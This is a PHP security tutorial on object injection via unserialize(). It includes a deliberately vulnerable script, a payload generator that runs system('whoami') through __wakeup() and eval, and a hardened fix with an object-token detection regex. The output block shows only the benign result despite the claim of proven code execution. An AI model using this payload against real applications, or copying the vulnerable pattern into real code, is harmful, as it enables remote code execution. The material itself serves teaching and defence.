First of all, let's explain what serialisation and deserialisation mean. Serialisation transforms an object from an object-oriented programming language such as Java, Python or PHP into a format that can be stored or transferred. Deserialisation turns serialised objects read from files or the network back into ordinary programming objects.
An attacker could manipulate serialised objects to change the application's logic, perform a denial of service, or execute arbitrary code when they are deserialised.
When you control a serialised object that is passed into `unserialize()`, you control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed magic methods such as `__wakeup()` or `__destruct()`.
In this proof of concept, the vulnerable code receives a serialised object through the GET parameter `r`, then unserialises it into an array and prints the first two values. However, an attacker could create their own `inject` variable, whose value will be executed by the `eval` function right after `unserialize` has run, because the `__wakeup()` magic method is invoked automatically on the deserialised object.
The vulnerable script (excerpt of `vuln.php`; the `PHPObjectInjection` class whose `__wakeup()` calls `eval()` on `$inject` is declared earlier in the file and not shown here). The untrusted `r` parameter is handed straight to `unserialize()`:

```php
<?php
$var1 = unserialize($_GET['r']);   // attacker-controlled input reaches unserialize()
if (is_array($var1)) {
    echo "<br/>".$var1[0]." - ".$var1[1];   // prints the first two values of the array
} else {
    echo ""; # nothing happens here
}
```

Serve it locally with PHP's built-in web server:

```shell
php -S localhost:8080 vuln.php
```

Payload generator (the class name must match the one declared in `vuln.php`, so that `unserialize()` instantiates it and fires `__wakeup()`):

```php
<?php
class PHPObjectInjection {
    public $inject = "system('whoami');";
}
# Intended use
echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data
# Malicious use
echo urlencode(serialize(new PHPObjectInjection)); # Command execution (__wakeup)
```
As you can see below, because the attacker could replace the `$inject` variable with the command `whoami`, the attacker gained RCE and learned which user account runs the PHP service.

```text
vul - nerable
```
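For contrast, here is a hardened replacement for the `unserialize()` call in `vuln.php`. This is an added example, not code from the original PoC; the function names, the 400 response and the log line are my own choices, and it assumes PHP 7.0 or later (the `allowed_classes` option) and that `r` is only ever meant to carry a list of two strings.

```php
<?php
// Added example (not part of the original PoC): hardened handling of the "r" parameter.
declare(strict_types=1);

// Heuristic for logging/alerting only: does the raw payload carry an object (O:)
// or a custom-serialised class (C:) token? The real control is safeUnserializeList().
function looksLikeObjectInjection(string $raw): bool
{
    return preg_match('/(?:^|[;{])[OC]:\d+:"/', $raw) === 1;
}

// Accept only the shape the application needs: an array of exactly two strings.
// allowed_classes => false turns any O:/C: token into __PHP_Incomplete_Class, so
// no application-defined __wakeup()/__destruct() can run on attacker-supplied data.
function safeUnserializeList(string $raw): ?array
{
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || count($data) !== 2) {
        return null;
    }
    foreach ($data as $v) {
        if (!is_string($v)) {
            return null;   // rejects nested objects, including __PHP_Incomplete_Class
        }
    }
    return array_values($data);
}

$raw = $_GET['r'] ?? '';
if (looksLikeObjectInjection($raw)) {
    // Worth an alert even though the payload is blocked below.
    error_log('possible PHP object injection attempt from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
}

$list = safeUnserializeList($raw);
if ($list === null) {
    http_response_code(400);
    exit('invalid payload');
}

// The values are still untrusted after shape-checking: escape before echoing.
echo '<br/>' . htmlspecialchars($list[0], ENT_QUOTES, 'UTF-8')
   . ' - ' . htmlspecialchars($list[1], ENT_QUOTES, 'UTF-8');
```

`allowed_classes` is a mitigation for code that must keep the PHP serialisation wire format; for new code, prefer `json_decode()` for untrusted input, since JSON cannot instantiate application classes at all.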